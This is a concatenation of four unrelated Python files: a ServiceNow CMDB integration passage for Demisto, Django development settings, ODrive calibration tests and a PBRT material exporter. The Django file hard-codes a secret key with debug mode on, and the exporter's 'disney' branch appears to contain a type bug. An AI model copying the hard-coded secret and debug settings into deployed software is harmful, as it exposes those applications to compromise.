context: dict = defaultdict(list)
class_name = args.get('class')
sys_id = args.get('sys_id')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
response = client.get_record(class_name=class_name, sys_id=sys_id, params=params)
result = response.get('result')
if result:
context['ServiceNowCMDB.Record(val.ID===obj.ID)'] = {
'Class': class_name,
'SysID': sys_id,
'Attributes': result.get('attributes', {}),
'InboundRelations': result.get('inbound_relations', []),
'OutboundRelations': result.get('outbound_relations', []),
}
hr_title = f'### Found the following attributes and relations for record {sys_id}:'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
context['ServiceNowCMDB.Record(val.ID===obj.ID)'] = {
'Class': class_name,
'SysID': sys_id
}
human_readable = f'Found no attributes and relations for record {sys_id}.'
return human_readable, context, response
def create_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Create a record with associated relations.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(CREAT_RECORD_DATA_FIELDS, args)
response = client.create_record(class_name=class_name, params=params, data=str(data))
result = response.get('result')
if result:
sys_id = result.get('attributes', {}).get('sys_id')
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Record {sys_id} was created successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = 'Failed to create a new record.'
return human_readable, context, response
def update_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Update a record with attributes given by the user.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(UPDATE_RECORD_DATA_FIELDS, args)
response = client.update_record(class_name=class_name, sys_id=sys_id, data=str(data), params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Updated record {sys_id} successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to update record {sys_id}.'
return human_readable, context, response
def add_relation_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Add new relations to an existing record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(ADD_RELATION_DATA_FIELDS, args)
response = client.add_relation(class_name=class_name, sys_id=sys_id, data=str(data), params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### New relations were added to {sys_id} record successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to add new relations to record {sys_id}.'
return human_readable, context, response
def delete_relation_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Delete relations for an existing record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
rel_sys_id = args.get('relation_sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
response = client.delete_relation(class_name=class_name, sys_id=sys_id, rel_sys_id=rel_sys_id, params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Deleted relation {rel_sys_id} successfully from {sys_id} record.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to delete relation {rel_sys_id} from record {sys_id}.'
return human_readable, context, response
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: ServiceNow CMDB client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
# Notify the user that test button can't be used when using OAuth 2.0:
if client.use_oauth:
return_error('Test button cannot be used when using OAuth 2.0. Please use the !servicenow-cmdb-oauth-login '
'command followed by the !servicenow-cmdb-oauth-test command to test the instance.')
try:
client.records_list(class_name='cmdb_ci_linux_server')
except Exception as e:
raise e
return 'ok'
def oauth_test_module(client: Client, *_) -> Tuple[str, Dict[Any, Any], Dict[Any, Any]]:
    """Test the instance configurations when using OAuth authorization.

    :param client: ServiceNow CMDB client to use.
    :return: human readable confirmation plus empty context/raw outputs.
    """
    if not client.use_oauth:
        return_error('!servicenow-cmdb-oauth-test command should be used only when using OAuth 2.0 authorization.\n '
                     'Please select the `Use OAuth Login` checkbox in the instance configuration before running this '
                     'command.')
    # A simple authenticated request; any failure propagates to the caller
    # (the previous `except Exception as e: raise e` was a no-op).
    client.records_list(class_name='cmdb_ci_linux_server')
    hr = '### Instance Configured Successfully.\n'
    return hr, {}, {}
def login_command(client: Client, args: Dict[str, Any]) -> Tuple[str, Dict[Any, Any], Dict[Any, Any]]:
    """
    Login the user using OAuth authorization.

    Args:
        client: Client object with request.
        args: Usually demisto.args()

    Returns:
        Demisto Outputs.
    """
    # Verify that the user selected the `Use OAuth Login` checkbox:
    if not client.use_oauth:
        return_error('!servicenow-cmdb-oauth-login command can be used only when using OAuth 2.0 authorization.\n '
                     'Please select the `Use OAuth Login` checkbox in the instance configuration before running this '
                     'command.')
    username = args.get('username', '')
    password = args.get('password', '')
    try:
        client.snow_client.login(username, password)
        hr = '### Logged in successfully.\n A refresh token was saved to the integration context and will be ' \
             'used to generate a new access token once the current one expires.'
    except Exception as e:
        # return_error terminates execution, so `hr` is never read on this path.
        # Note the trailing space after 'for ' - the adjacent f-strings used to
        # concatenate into "forcorrect usage".
        return_error(f'Failed to login. Please verify that the provided username and password are correct, and that you'
                     f' entered the correct client id and client secret in the instance configuration (see ? for '
                     f'correct usage when using OAuth).\n\n{e}')
    return hr, {}, {}
''' MAIN FUNCTION '''


def main() -> None:
    """main function, parses params and runs command functions"""
    params = demisto.params()
    url = params.get('url', '')
    verify = not params.get('insecure', False)
    proxy = params.get('proxy', False)
    client_id = client_secret = ''
    credentials = params.get('credentials', {})
    use_oauth = params.get('use_oauth', False)
    # Client id/secret are only relevant when OAuth 2.0 login is enabled:
    if use_oauth:
        client_id = credentials.get('identifier')
        client_secret = credentials.get('password')

    client = Client(credentials=credentials, use_oauth=use_oauth, client_id=client_id,
                    client_secret=client_secret, url=url, verify=verify, proxy=proxy)

    # Map command names to their implementations. Each returns demisto outputs.
    commands = {
        'servicenow-cmdb-oauth-login': login_command,
        'servicenow-cmdb-oauth-test': oauth_test_module,
        'servicenow-cmdb-records-list': records_list_command,
        'servicenow-cmdb-record-get-by-id': get_record_command,
        'servicenow-cmdb-record-create': create_record_command,
        'servicenow-cmdb-record-update': update_record_command,
        'servicenow-cmdb-record-add-relations': add_relation_command,
        'servicenow-cmdb-record-delete-relations': delete_relation_command
    }

    command = demisto.command()
    demisto.debug(f'Command being called is {command}')
    try:
        # Use the already-bound `command` consistently (was a second
        # demisto.command() call for the test-module branch).
        if command == 'test-module':
            # This is the call made when pressing the integration Test button.
            result = test_module(client)
            return_results(result)
        elif command in commands:
            return_outputs(*commands[command](client, demisto.args()))  # type: ignore
        else:
            return_error('Command not found.')
    # Log exceptions and return errors
    except Exception as e:
        demisto.error(traceback.format_exc())  # print the traceback
        return_error(f'Failed to execute {command} command.\nError:\n{str(e)}')
from ServiceNowApiModule import * # noqa: E402
''' ENTRY POINT '''
# Run main() both when executed directly and when exec'ed by the Demisto
# server (which reports __builtin__/builtins as the module name).
if __name__ in ('__main__', '__builtin__', 'builtins'):
    main()
| |
"""
Django settings for timecounter project.
Generated by 'django-admin startproject' using Django 1.8.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

# Project root: two directory levels above this settings file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Site id for django.contrib.sites (also used by flatpages).
SITE_ID = 1

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_7(h-e9a!me5gshvyfb4kxv!=_oek$bcfj&+ays)e7tfnfg%^i'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Keep template debug output in sync with the global DEBUG flag
# (pre-1.8 style setting; superseded by TEMPLATES OPTIONS in newer Django).
TEMPLATES_DEBUG = DEBUG

ALLOWED_HOSTS = ['127.0.0.1', 'localhost']

# Application definition

INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.sites',
    'django.contrib.flatpages',
    # project apps
    'users',
    'dashboard',
    'debug_toolbar',
    'local_core'
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    # flatpages fallback is last so it only handles responses that would 404
    'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)

ROOT_URLCONF = 'timecounter.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
            # 'builtins': ['dashboard.templatetags.custom_tag']
        },
    },
]

WSGI_APPLICATION = 'timecounter.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Logging: console handlers are switched on DEBUG via the require_debug_*
# filters; warnings/errors and request traffic also go to files.
# NOTE(review): the file handlers assume BASE_DIR/logs exists - confirm it is
# created at deploy time, otherwise FileHandler raises on startup.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(module)s %(process)d %(thread)d %(message)s'
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        }
    },
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse',
        },
        'require_debug_true': {
            '()': 'django.utils.log.RequireDebugTrue',
        },
    },
    'handlers': {
        'null': {
            'level': 'DEBUG',
            'class': 'logging.NullHandler'
        },
        # console output only while DEBUG is on
        'console_debug': {
            'level': 'DEBUG',
            'filters': ['require_debug_true'],
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
        # console output only while DEBUG is off
        'console': {
            'level': 'INFO',
            'filters': ['require_debug_false'],
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
        'access_file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': BASE_DIR + '/logs/access.log',
            'formatter': 'verbose'
        },
        'error_file': {
            'level': 'WARN',
            'class': 'logging.FileHandler',
            'filename': BASE_DIR + '/logs/error.log',
            'formatter': 'verbose'
        }
    },
    'loggers': {
        # 'core.handlers': {
        #     'level': 'DEBUG',
        #     'handlers': ['console', 'console_debug']
        # },
        # root logger
        '': {
            'level': 'INFO',
            'handlers': ['console', 'console_debug', 'error_file'],
            'propagate': False
        },
        'django': {
            'handlers': ['console', 'console_debug', 'error_file'],
            'propagate': False
        },
        'django.request': {
            'level': 'DEBUG',
            'handlers': ['console_debug', 'access_file'],
            'propagate': False
        },
        'main': {
            'level': 'DEBUG',
            'handlers': ['console_debug', 'console'],
            'propagate': False
        }
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/

STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# Media/static live as siblings of the project directory.
MEDIA_ROOT = os.path.abspath(os.path.join(BASE_DIR, '..', 'media'))
STATIC_ROOT = os.path.abspath(os.path.join(BASE_DIR, '..', 'static'))
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)

# Register the project template tags globally.
# NOTE(review): add_to_builtins was removed in Django 1.9 - on upgrade,
# replace this with the 'builtins' key in TEMPLATES OPTIONS (see commented
# example above).
from django.template.base import add_to_builtins
add_to_builtins('local_core.templatetags.custom_tags')
| |
import test_runner
import time
from math import pi
import os
from fibre.utils import Logger
from test_runner import *
from odrive.enums import *
class TestMotorCalibration():
    """
    Runs the motor calibration (phase inductance and phase resistance measurement)
    and checks if the measurements match the expectation.
    """

    def get_test_cases(self, testrig: TestRig):
        """Returns all axes that are connected to a motor, along with the corresponding motor(s)"""
        for axis in testrig.get_components(ODriveAxisComponent):
            for motor, tf in testrig.get_connected_components({'phases': axis}, MotorComponent):
                yield (axis, motor, tf)

    def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, logger: Logger):
        # reset old calibration values
        axis_ctx.parent.erase_config_and_reboot()

        #if axis_ctx.handle.encoder.config.mode != ENCODER_MODE_INCREMENTAL:
        #    axis_ctx.handle.encoder.config.mode = ENCODER_MODE_INCREMENTAL
        #    axis_ctx.parent.save_config_and_reboot()

        # start from a clean, uncalibrated state
        axis_ctx.handle.motor.config.phase_resistance = 0.0
        axis_ctx.handle.motor.config.phase_inductance = 0.0
        axis_ctx.handle.motor.config.pre_calibrated = False
        # disable the watchdog for the duration of the test
        axis_ctx.handle.config.enable_watchdog = False
        # permit negative DC bus current during the measurement
        axis_ctx.parent.handle.config.dc_max_negative_current = -1.0
        axis_ctx.parent.handle.clear_errors()

        # run calibration and wait until the state machine returns to idle
        request_state(axis_ctx, AXIS_STATE_MOTOR_CALIBRATION)
        time.sleep(6)
        test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
        test_assert_no_error(axis_ctx)

        # check if measurements match expectation (relative accuracy bounds)
        test_assert_eq(axis_ctx.handle.motor.config.phase_resistance, float(motor_ctx.yaml['phase-resistance']), accuracy=0.2)
        test_assert_eq(axis_ctx.handle.motor.config.phase_inductance, float(motor_ctx.yaml['phase-inductance']), accuracy=0.5)
        test_assert_eq(axis_ctx.handle.motor.is_calibrated, True)
class TestDisconnectedMotorCalibration():
    """
    Tests if the motor calibration fails as expected if the phases are floating.
    """

    def get_test_cases(self, testrig: TestRig):
        """Returns all axes that are disconnected"""
        for axis in testrig.get_components(ODriveAxisComponent):
            if axis.yaml == 'floating':
                yield (axis, None)

    def run_test(self, axis_ctx: ODriveAxisComponent, logger: Logger):
        axis = axis_ctx.handle  # NOTE(review): unused - kept for parity with the other tests

        # reset old calibration values
        axis_ctx.handle.motor.config.phase_resistance = 0.0
        axis_ctx.handle.motor.config.phase_inductance = 0.0
        axis_ctx.handle.motor.config.pre_calibrated = False
        axis_ctx.parent.handle.clear_errors()

        # run test
        request_state(axis_ctx, AXIS_STATE_MOTOR_CALIBRATION)
        time.sleep(6)
        test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
        # with floating phases the resistance measurement must go out of range
        test_assert_eq(axis_ctx.handle.motor.error, MOTOR_ERROR_PHASE_RESISTANCE_OUT_OF_RANGE)
class TestEncoderDirFind():
    """
    Runs the encoder direction find procedure and checks that a valid
    direction (+1 or -1) was detected.
    (The original docstring said "index search" - copy/paste artifact.)
    """

    def get_test_cases(self, testrig: TestRig):
        return testrig.get_closed_loop_combos(init=False)

    def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, logger: Logger):
        axis = axis_ctx.handle  # NOTE(review): unused - kept as in the original
        time.sleep(1.0)  # wait for PLLs to stabilize

        # Set motor calibration values
        axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
        axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
        axis_ctx.handle.motor.config.pre_calibrated = True

        # Set calibration settings (direction 0 = unknown, to be detected)
        axis_ctx.handle.encoder.config.direction = 0
        axis_ctx.handle.config.calibration_lockin.vel = 12.566  # 2 electrical revolutions per second
        axis_ctx.parent.handle.clear_errors()

        # run test
        request_state(axis_ctx, AXIS_STATE_ENCODER_DIR_FIND)
        time.sleep(4)  # actual calibration takes 3 seconds
        test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
        test_assert_no_error(axis_ctx)
        # a definite direction must have been detected
        test_assert_eq(axis_ctx.handle.encoder.config.direction in [-1, 1], True)
class TestEncoderOffsetCalibration():
    """
    Runs the encoder offset calibration and checks that the encoder becomes
    ready with a valid direction.
    (The original docstring said "index search" - copy/paste artifact.)
    """

    def get_test_cases(self, testrig: TestRig):
        return testrig.get_closed_loop_combos(init=False)

    def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, logger: Logger):
        axis = axis_ctx.handle  # NOTE(review): unused - kept as in the original
        time.sleep(1.0)  # wait for PLLs to stabilize

        # Set motor calibration values
        axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
        axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
        axis_ctx.handle.motor.config.pre_calibrated = True

        # Set calibration settings
        axis_ctx.handle.encoder.config.direction = 0
        axis_ctx.handle.encoder.config.use_index = False
        axis_ctx.handle.encoder.config.calib_scan_omega = 12.566  # 2 electrical revolutions per second
        axis_ctx.handle.encoder.config.calib_scan_distance = 50.265  # 8 revolutions
        axis_ctx.parent.handle.clear_errors()

        # run test
        request_state(axis_ctx, AXIS_STATE_ENCODER_OFFSET_CALIBRATION)
        time.sleep(9.1)  # actual calibration takes 9.0 seconds
        test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
        test_assert_no_error(axis_ctx)
        test_assert_eq(axis_ctx.handle.encoder.is_ready, True)
        test_assert_eq(axis_ctx.handle.encoder.config.direction in [-1, 1], True)
class TestEncoderIndexSearch():
    """
    Runs the encoder index search.
    The index pin is triggered manually after three seconds from the testbench
    host's GPIO.
    """

    def get_test_cases(self, testrig: TestRig):
        # For each closed-loop combo, collect the host GPIOs wired to the
        # encoder's index (Z) pin; any one of them can drive the test.
        for axis, motor, encoder, tf1 in testrig.get_closed_loop_combos(init=False):
            alternatives = []
            for z_gpio, tf2 in testrig.get_connected_components((axis.parent.encoders[axis.num].z, False), LinuxGpioComponent):
                alternatives.append((axis, motor, encoder, z_gpio, TestFixture.all_of(tf1, tf2)))
            yield AnyTestCase(*alternatives)

    def run_test(self, axis_ctx: ODriveAxisComponent, motor_ctx: MotorComponent, enc_ctx: EncoderComponent, z_gpio: LinuxGpioComponent, logger: Logger):
        axis = axis_ctx.handle  # NOTE(review): unused - kept as in the original
        cpr = int(enc_ctx.yaml['cpr'])

        # drive the index pin low before the search starts
        z_gpio.config(output=True)
        z_gpio.write(False)
        time.sleep(1.0)  # wait for PLLs to stabilize

        # Set motor calibration values
        axis_ctx.handle.motor.config.phase_resistance = float(motor_ctx.yaml['phase-resistance'])
        axis_ctx.handle.motor.config.phase_inductance = float(motor_ctx.yaml['phase-inductance'])
        axis_ctx.handle.motor.config.pre_calibrated = True

        # Set calibration settings
        axis_ctx.handle.config.calibration_lockin.vel = 12.566  # 2 electrical revolutions per second
        axis_ctx.parent.handle.clear_errors()

        # run test
        request_state(axis_ctx, AXIS_STATE_ENCODER_INDEX_SEARCH)
        time.sleep(3)
        # index must not be reported before the pin is pulsed
        test_assert_eq(axis_ctx.handle.encoder.index_found, False)
        time.sleep(0.1)
        z_gpio.write(True)  # simulate the index pulse
        test_assert_eq(axis_ctx.handle.encoder.index_found, True)
        z_gpio.write(False)
        test_assert_eq(axis_ctx.handle.current_state, AXIS_STATE_IDLE)
        test_assert_no_error(axis_ctx)
        # position must have been referenced to ~0 at the index pulse
        test_assert_eq(axis_ctx.handle.encoder.shadow_count, 0.0, range=50)
        test_assert_eq(modpm(axis_ctx.handle.encoder.count_in_cpr, cpr), 0.0, range=50)
        test_assert_eq(axis_ctx.handle.encoder.pos_estimate, 0.0, range=50)
        test_assert_eq(modpm(axis_ctx.handle.encoder.pos_cpr_counts, cpr), 0.0, range=50)
        test_assert_eq(axis_ctx.handle.encoder.pos_abs, 0.0, range=50)
# All test cases, in execution order.
tests = [
    TestMotorCalibration(),
    TestDisconnectedMotorCalibration(),
    TestEncoderDirFind(),
    TestEncoderOffsetCalibration(),
    TestEncoderIndexSearch()
]

if __name__ == '__main__':
    test_runner.run(tests)
| |
from . import colexport
from . import iorexport
def getRefl(operator, op, name, default):
    """Unpack the reflectance parameter `name` from `op`, or `default` if absent."""
    value = op.parameters[name] if name in op.parameters else default
    return colexport.unpackRefl(operator, value)
def getIOR(operator, op, name, default):
    """Unpack the index-of-refraction parameter `name` from `op`, or `default`."""
    value = op.parameters[name] if name in op.parameters else default
    return iorexport.unpackIOR(operator, value)
def getK(operator, op, name, default):
    """Unpack the absorption (k) parameter `name` from `op`, or `default`."""
    value = op.parameters[name] if name in op.parameters else default
    return iorexport.unpackK(operator, value)
def getScal(operator, op, name, default, doSqrt=False):
    """Fetch the scalar parameter `name` from `op` and render it as a string.

    A string value names a texture; a list is collapsed to its arithmetic
    mean; anything else is stringified directly.
    """
    val = op.parameters.get(name, default)
    if isinstance(val, str):
        # texture reference -- doSqrt cannot be applied here (What if doSqrt?)
        return "(texture '%s')" % val
    if isinstance(val, list):
        # TODO: averaging a spectrum is a crude approximation
        return str(sum(val) / len(val))
    return str(val)
def getRoughness(operator, op):
    """Return (roughness_x, roughness_y) as strings, or None if unspecified.

    Precedence: explicit u/v pair, then u only (isotropic), then the plain
    'roughness' parameter (isotropic).
    """
    params = op.parameters
    if "uroughness" in params and "vroughness" in params:
        rough_x = getScal(operator, op, 'uroughness', 0)
        rough_y = getScal(operator, op, 'vroughness', 0)
    elif "uroughness" in params:
        rough_x = rough_y = getScal(operator, op, 'uroughness', 0)
    elif "roughness" in params:
        rough_x = rough_y = getScal(operator, op, 'roughness', 0)
    else:
        return None
    return (rough_x, rough_y)
def export(operator, op, isNamed):
    """Translate one PBRT material statement into the target scene format.

    operator -- exporter state: writer `w` (write/goIn/goOut) and the running
                `matCount` counter (incremented here).
    op       -- parsed PBRT operator with `.operand` and `.parameters`.
    isNamed  -- True for MakeNamedMaterial (name in operand, type in
                parameters), False for Material (type in operand).

    Returns the name under which the material was emitted.
    """
    if isNamed:
        # MakeNamedMaterial: type comes from the parameters, name from operand
        mat_type = op.parameters.get('type', 'NONE')
        name = op.operand
    else:
        # anonymous Material: operand is the type; synthesize a unique name
        mat_type = op.operand
        name = "material_%i" % operator.matCount

    if mat_type == "matte":
        # PBRT 'matte' maps to a plain diffuse material
        color = getRefl(operator, op, 'Kd', [1, 1, 1])

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'diffuse'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":albedo %s" % color)

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "glass":
        color = getRefl(operator, op, 'Ks', [1, 1, 1])

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'glass'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":specularity %s" % color)
        operator.w.write(":index %s" % getIOR(operator, op, 'eta', 'bk7'))

        # emit anisotropic roughness only when the two directions differ
        roughness = getRoughness(operator, op)
        if roughness is not None:
            if roughness[0] != roughness[1]:
                operator.w.write(":roughness_x %s" % roughness[0])
                operator.w.write(":roughness_y %s" % roughness[1])
            else:
                operator.w.write(":roughness %s" % roughness[0])

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "metal":
        eta = getIOR(operator, op, 'eta', 'copper')
        k = getK(operator, op, 'k', 'copper')

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'conductor'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":eta %s" % eta)
        operator.w.write(":k %s" % k)

        roughness = getRoughness(operator, op)
        if roughness is not None:
            if roughness[0] != roughness[1]:
                operator.w.write(":roughness_x %s" % roughness[0])
                operator.w.write(":roughness_y %s" % roughness[1])
            else:
                operator.w.write(":roughness %s" % roughness[0])

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "mirror":
        color = getRefl(operator, op, 'Kr', [1, 1, 1])

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'mirror'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":specularity %s" % color)

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "substrate":
        # substrate approximated by the principled material
        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'principled'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":base %s" % getRefl(
            operator, op, 'Kd', [0.5, 0.5, 0.5]))  # TODO
        #operator.w.write(":specular %s" % getScal(operator, op, 'Ks', 0.5))
        operator.w.write(":index %s" % getIOR(operator, op, 'eta', 'bk7'))

        roughness = getRoughness(operator, op)
        if roughness is not None:
            if roughness[0] != roughness[1]:  # TODO
                operator.w.write(":roughness_x %s" % roughness[0])
                operator.w.write(":roughness_y %s" % roughness[1])
            else:
                operator.w.write(":roughness %s" % roughness[0])

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "disney":
        color = getRefl(operator, op, 'color', [1, 1, 1])
        # NOTE(review): getRefl typically yields a reflectance string; the
        # arithmetic below expects a number - getScal/getIOR may have been
        # intended here. TODO confirm with a 'disney' input.
        eta = getRefl(operator, op, 'eta', 1)
        spec = ((eta - 1) / (eta + 1))**2

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'principled'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":base %s" % color)
        operator.w.write(":roughness %s" %
                         getScal(operator, op, 'roughness', 0.5))
        operator.w.write(":specular %s" % spec)
        operator.w.write(":specular_tint %s" %
                         getScal(operator, op, 'speculartint', 0))
        operator.w.write(":metallic %s" % getScal(operator, op, 'metallic', 0))
        operator.w.write(":clearcoat %s" %
                         getScal(operator, op, 'clearcoat', 0))
        operator.w.write(":clearcoat_gloss %s" %
                         getScal(operator, op, 'clearcoatgloss', 0))
        operator.w.write(":anisotropic %s" %
                         getScal(operator, op, 'anisotropic', 0))
        operator.w.write(":sheen %s" % getScal(operator, op, 'sheen', 0))
        operator.w.write(":sheen_tint %s" %
                         getScal(operator, op, 'sheentint', 0))
        # TODO: 'spectrans', 'scatterdistance' ?

        operator.w.goOut()
        operator.w.write(")")
    elif mat_type == "uber":
        # 'uber' is emulated by layering null/glass/diffuse via blend materials
        print("WARNING: 'uber' material will be approximated!")
        diff = getRefl(operator, op, 'Kd', [0.25, 0.25, 0.25])
        spec = getRefl(operator, op, 'Ks', [0.25, 0.25, 0.25])
        refl = getRefl(operator, op, 'Kr', [0, 0, 0])
        tran = getRefl(operator, op, 'Kt', [0, 0, 0])
        opacity = getScal(operator, op, 'opacity', 1)
        eta = getIOR(operator, op, 'eta', 1.55)

        hasOpacity = "opacity" in op.parameters
        hasGlass = "Kr" in op.parameters or "Kt" in op.parameters

        # Opacity material
        if hasOpacity:
            operator.w.write("(material")
